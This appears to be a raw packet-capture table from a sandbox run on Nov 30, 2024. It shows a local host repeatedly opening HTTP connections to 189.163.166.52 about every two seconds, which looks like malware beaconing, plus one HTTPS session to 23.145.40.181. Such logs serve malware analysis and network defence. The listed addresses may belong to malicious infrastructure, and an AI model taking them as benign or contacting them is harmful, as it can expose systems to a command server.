                                                                                                                        Nov 30, 2024 11:12:42.336317062 CET4974480192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:12:42.338871002 CET4974580192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:12:42.459860086 CET8049744189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:12:42.461201906 CET8049745189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:12:42.461308956 CET4974580192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:12:42.461447954 CET4974580192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:12:42.461447954 CET4974580192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:12:42.583837032 CET8049745189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:12:42.585999966 CET8049745189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:12:44.476198912 CET8049745189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:12:44.476545095 CET8049745189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:12:44.476603031 CET4974580192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:12:44.476634026 CET4974580192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:12:44.479034901 CET4974680192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:12:44.598704100 CET8049745189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:12:44.601094007 CET8049746189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:12:44.601171017 CET4974680192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:12:44.601337910 CET4974680192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:12:44.601353884 CET4974680192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:12:44.723973989 CET8049746189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:12:44.724148989 CET8049746189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:12:46.397649050 CET8049746189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:12:46.397878885 CET8049746189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:12:46.397929907 CET4974680192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:12:46.400681973 CET4974680192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:12:46.407629013 CET4974780192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:12:46.520601988 CET8049746189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:12:46.527987957 CET8049747189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:12:46.528069019 CET4974780192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:12:46.529252052 CET4974780192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:12:46.529280901 CET4974780192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:12:46.649240017 CET8049747189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:12:46.649282932 CET8049747189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:12:48.544128895 CET8049747189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:12:48.544383049 CET8049747189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:12:48.544488907 CET4974780192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:12:48.544488907 CET4974780192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:12:48.546755075 CET4974880192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:12:48.664453983 CET8049747189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:12:48.666644096 CET8049748189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:12:48.666712999 CET4974880192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:12:48.667563915 CET4974880192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:12:48.667592049 CET4974880192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:12:48.787628889 CET8049748189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:12:48.787643909 CET8049748189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:12:50.425718069 CET8049748189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:12:50.425745964 CET8049748189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:12:50.425796986 CET4974880192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:12:50.425940990 CET4974880192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:12:50.428491116 CET4974980192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:12:50.545840025 CET8049748189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:12:50.548418045 CET8049749189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:12:50.548593044 CET4974980192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:12:50.548768997 CET4974980192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:12:50.548789024 CET4974980192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:12:50.668653965 CET8049749189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:12:50.668756962 CET8049749189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:12:52.340101957 CET8049749189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:12:52.340122938 CET8049749189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:12:52.340198040 CET4974980192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:12:52.340341091 CET4974980192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:12:52.342854023 CET4975080192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:12:52.460235119 CET8049749189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:12:52.462905884 CET8049750189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:12:52.462977886 CET4975080192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:12:52.463105917 CET4975080192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:12:52.463133097 CET4975080192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:12:52.583766937 CET8049750189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:12:52.583868027 CET8049750189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:12:54.211771011 CET8049750189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:12:54.211802006 CET8049750189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:12:54.211867094 CET4975080192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:12:54.211978912 CET4975080192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:12:54.215408087 CET4975280192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:12:54.332532883 CET8049750189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:12:54.336149931 CET8049752189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:12:54.336229086 CET4975280192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:12:54.339349985 CET4975280192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:12:54.339375019 CET4975280192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:12:54.459330082 CET8049752189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:12:54.459343910 CET8049752189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:12:56.079293966 CET8049752189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:12:56.083652020 CET8049752189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:12:56.083759069 CET4975280192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:12:56.084434986 CET4975280192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:12:56.086777925 CET4975480192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:12:56.204425097 CET8049752189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:12:56.206814051 CET8049754189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:12:56.206898928 CET4975480192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:12:56.207856894 CET4975480192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:12:56.207885027 CET4975480192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:12:56.328816891 CET8049754189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:12:56.328835011 CET8049754189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:12:57.958450079 CET8049754189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:12:57.964160919 CET8049754189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:12:57.964234114 CET4975480192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:12:57.964301109 CET4975480192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:12:57.966617107 CET4975580192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:12:58.084218025 CET8049754189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:12:58.086549997 CET8049755189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:12:58.086636066 CET4975580192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:12:58.086781979 CET4975580192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:12:58.086811066 CET4975580192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:12:58.206857920 CET8049755189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:12:58.206990004 CET8049755189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:12:59.830614090 CET8049755189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:12:59.830696106 CET8049755189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:12:59.830749035 CET4975580192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:12:59.830873013 CET4975580192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:12:59.833554983 CET4976180192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:12:59.950865030 CET8049755189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:12:59.953535080 CET8049761189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:12:59.953635931 CET4976180192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:12:59.953778028 CET4976180192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:12:59.953802109 CET4976180192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:00.073817968 CET8049761189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:00.073831081 CET8049761189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:01.802746058 CET8049761189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:01.802768946 CET8049761189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:01.802937984 CET4976180192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:01.803212881 CET4976180192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:01.805500031 CET4976780192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:01.923430920 CET8049761189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:01.925647974 CET8049767189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:01.925818920 CET4976780192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:01.925877094 CET4976780192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:01.925900936 CET4976780192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:02.045850992 CET8049767189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:02.045876980 CET8049767189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:03.676213026 CET8049767189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:03.676316023 CET8049767189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:03.676362991 CET4976780192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:03.676420927 CET4976780192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:03.679007053 CET4977380192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:03.796830893 CET8049767189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:03.799277067 CET8049773189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:03.799349070 CET4977380192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:03.799493074 CET4977380192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:03.799519062 CET4977380192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:03.919440031 CET8049773189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:03.919512033 CET8049773189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:05.639331102 CET8049773189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:05.644725084 CET8049773189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:05.644767046 CET4977380192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:05.644813061 CET4977380192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:05.647500992 CET4977880192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:05.764673948 CET8049773189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:05.767364025 CET8049778189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:05.767432928 CET4977880192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:05.767579079 CET4977880192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:05.767607927 CET4977880192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:05.887546062 CET8049778189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:05.887691975 CET8049778189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:07.570679903 CET8049778189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:07.570805073 CET8049778189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:07.570894003 CET4977880192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:07.571094036 CET4977880192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:07.573508978 CET4978080192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:07.690982103 CET8049778189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:07.693438053 CET8049780189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:07.693505049 CET4978080192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:07.693670988 CET4978080192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:07.693706036 CET4978080192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:07.813981056 CET8049780189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:07.813993931 CET8049780189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:09.507329941 CET8049780189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:09.507489920 CET8049780189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:09.507540941 CET4978080192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:09.507682085 CET4978080192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:09.627659082 CET8049780189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:10.656449080 CET49791443192.168.2.423.145.40.181
                                                                                                                        Nov 30, 2024 11:13:10.656478882 CET4434979123.145.40.181192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:10.656543970 CET49791443192.168.2.423.145.40.181
                                                                                                                        Nov 30, 2024 11:13:10.656896114 CET49791443192.168.2.423.145.40.181
                                                                                                                        Nov 30, 2024 11:13:10.656909943 CET4434979123.145.40.181192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:12.097831011 CET4434979123.145.40.181192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:12.097930908 CET49791443192.168.2.423.145.40.181
                                                                                                                        Nov 30, 2024 11:13:12.104140997 CET49791443192.168.2.423.145.40.181
                                                                                                                        Nov 30, 2024 11:13:12.104152918 CET4434979123.145.40.181192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:12.104409933 CET4434979123.145.40.181192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:12.122706890 CET49791443192.168.2.423.145.40.181
                                                                                                                        Nov 30, 2024 11:13:12.167330027 CET4434979123.145.40.181192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:12.622001886 CET4434979123.145.40.181192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:12.622026920 CET4434979123.145.40.181192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:12.622185946 CET49791443192.168.2.423.145.40.181
                                                                                                                        Nov 30, 2024 11:13:12.622204065 CET4434979123.145.40.181192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:12.663271904 CET49791443192.168.2.423.145.40.181
                                                                                                                        Nov 30, 2024 11:13:12.832181931 CET4434979123.145.40.181192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:12.832191944 CET4434979123.145.40.181192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:12.832268953 CET49791443192.168.2.423.145.40.181
                                                                                                                        Nov 30, 2024 11:13:12.853069067 CET4434979123.145.40.181192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:12.853076935 CET4434979123.145.40.181192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:12.853133917 CET49791443192.168.2.423.145.40.181
                                                                                                                        Nov 30, 2024 11:13:12.878456116 CET4434979123.145.40.181192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:12.878463984 CET4434979123.145.40.181192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:12.878561020 CET49791443192.168.2.423.145.40.181
                                                                                                                        Nov 30, 2024 11:13:12.899914026 CET4434979123.145.40.181192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:12.899980068 CET49791443192.168.2.423.145.40.181
                                                                                                                        Nov 30, 2024 11:13:13.042807102 CET4434979123.145.40.181192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:13.042902946 CET49791443192.168.2.423.145.40.181
                                                                                                                        Nov 30, 2024 11:13:13.055180073 CET4434979123.145.40.181192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:13.055345058 CET49791443192.168.2.423.145.40.181
                                                                                                                        Nov 30, 2024 11:13:13.070139885 CET4434979123.145.40.181192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:13.070305109 CET49791443192.168.2.423.145.40.181
                                                                                                                        Nov 30, 2024 11:13:13.084928036 CET4434979123.145.40.181192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:13.085100889 CET49791443192.168.2.423.145.40.181
                                                                                                                        Nov 30, 2024 11:13:13.098143101 CET4434979123.145.40.181192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:13.098221064 CET49791443192.168.2.423.145.40.181
                                                                                                                        Nov 30, 2024 11:13:13.108097076 CET4434979123.145.40.181192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:13.108275890 CET49791443192.168.2.423.145.40.181
                                                                                                                        Nov 30, 2024 11:13:13.118201971 CET4434979123.145.40.181192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:13.118272066 CET49791443192.168.2.423.145.40.181
                                                                                                                        Nov 30, 2024 11:13:13.128158092 CET4434979123.145.40.181192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:13.128261089 CET49791443192.168.2.423.145.40.181
                                                                                                                        Nov 30, 2024 11:13:13.253307104 CET4434979123.145.40.181192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:13.253633022 CET49791443192.168.2.423.145.40.181
                                                                                                                        Nov 30, 2024 11:13:13.261033058 CET4434979123.145.40.181192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:13.261112928 CET49791443192.168.2.423.145.40.181
                                                                                                                        Nov 30, 2024 11:13:13.270540953 CET4434979123.145.40.181192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:13.270622015 CET49791443192.168.2.423.145.40.181
                                                                                                                        Nov 30, 2024 11:13:13.280006886 CET4434979123.145.40.181192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:13.280081987 CET49791443192.168.2.423.145.40.181
                                                                                                                        Nov 30, 2024 11:13:13.292457104 CET4434979123.145.40.181192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:13.292515993 CET49791443192.168.2.423.145.40.181
                                                                                                                        Nov 30, 2024 11:13:13.297405005 CET4434979123.145.40.181192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:13.297470093 CET49791443192.168.2.423.145.40.181
                                                                                                                        Nov 30, 2024 11:13:13.302448988 CET4434979123.145.40.181192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:13.302522898 CET49791443192.168.2.423.145.40.181
                                                                                                                        Nov 30, 2024 11:13:13.307471037 CET4434979123.145.40.181192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:13.307552099 CET49791443192.168.2.423.145.40.181
                                                                                                                        Nov 30, 2024 11:13:13.314027071 CET4434979123.145.40.181192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:13.314122915 CET49791443192.168.2.423.145.40.181
                                                                                                                        Nov 30, 2024 11:13:13.319175959 CET4434979123.145.40.181192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:13.319255114 CET49791443192.168.2.423.145.40.181
                                                                                                                        Nov 30, 2024 11:13:13.320849895 CET4434979123.145.40.181192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:13.320899963 CET4434979123.145.40.181192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:13.320950031 CET49791443192.168.2.423.145.40.181
                                                                                                                        Nov 30, 2024 11:13:13.320980072 CET49791443192.168.2.423.145.40.181
                                                                                                                        Nov 30, 2024 11:13:13.320992947 CET4434979123.145.40.181192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:13.341000080 CET4979780192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:13.461041927 CET8049797189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:13.461112022 CET4979780192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:13.461258888 CET4979780192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:13.461287975 CET4979780192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:13.581319094 CET8049797189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:13.581343889 CET8049797189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:15.257535934 CET8049797189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:15.257600069 CET8049797189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:15.257747889 CET4979780192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:15.262013912 CET4979780192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:15.270701885 CET4980380192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:15.381953955 CET8049797189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:15.390645027 CET8049803189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:15.390754938 CET4980380192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:15.396183014 CET4980380192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:15.396204948 CET4980380192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:15.516215086 CET8049803189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:15.516267061 CET8049803189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:17.454736948 CET8049803189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:17.454768896 CET8049803189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:17.454824924 CET4980380192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:17.455091953 CET4980380192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:17.458414078 CET4980980192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:17.574975014 CET8049803189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:17.578366041 CET8049809189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:17.578476906 CET4980980192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:17.578808069 CET4980980192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:17.578838110 CET4980980192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:17.699543953 CET8049809189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:17.699687004 CET8049809189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:19.368659019 CET8049809189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:19.374459028 CET8049809189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:19.374519110 CET4980980192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:19.374558926 CET4980980192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:19.377026081 CET4981580192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:19.494515896 CET8049809189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:19.496925116 CET8049815189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:19.496989012 CET4981580192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:19.497152090 CET4981580192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:19.497152090 CET4981580192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:19.617201090 CET8049815189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:19.617300987 CET8049815189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:21.288722992 CET8049815189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:21.288827896 CET8049815189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:21.288923025 CET4981580192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:21.289062023 CET4981580192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:21.292443991 CET4981980192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:21.410607100 CET8049815189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:21.414350986 CET8049819189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:21.415646076 CET4981980192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:21.415868998 CET4981980192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:21.415903091 CET4981980192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:21.536211014 CET8049819189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:21.536299944 CET8049819189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:23.208852053 CET8049819189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:23.208998919 CET8049819189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:23.209111929 CET4981980192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:23.209139109 CET4981980192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:23.211651087 CET4982380192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:23.329133987 CET8049819189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:23.331640005 CET8049823189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:23.331847906 CET4982380192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:23.331949949 CET4982380192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:23.331978083 CET4982380192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:23.452244997 CET8049823189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:23.452259064 CET8049823189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:25.128737926 CET8049823189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:25.128890991 CET8049823189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:25.128969908 CET4982380192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:25.133466005 CET4982380192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:25.253410101 CET8049823189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:25.333441973 CET4982880192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:25.453382969 CET8049828189.163.166.52192.168.2.4
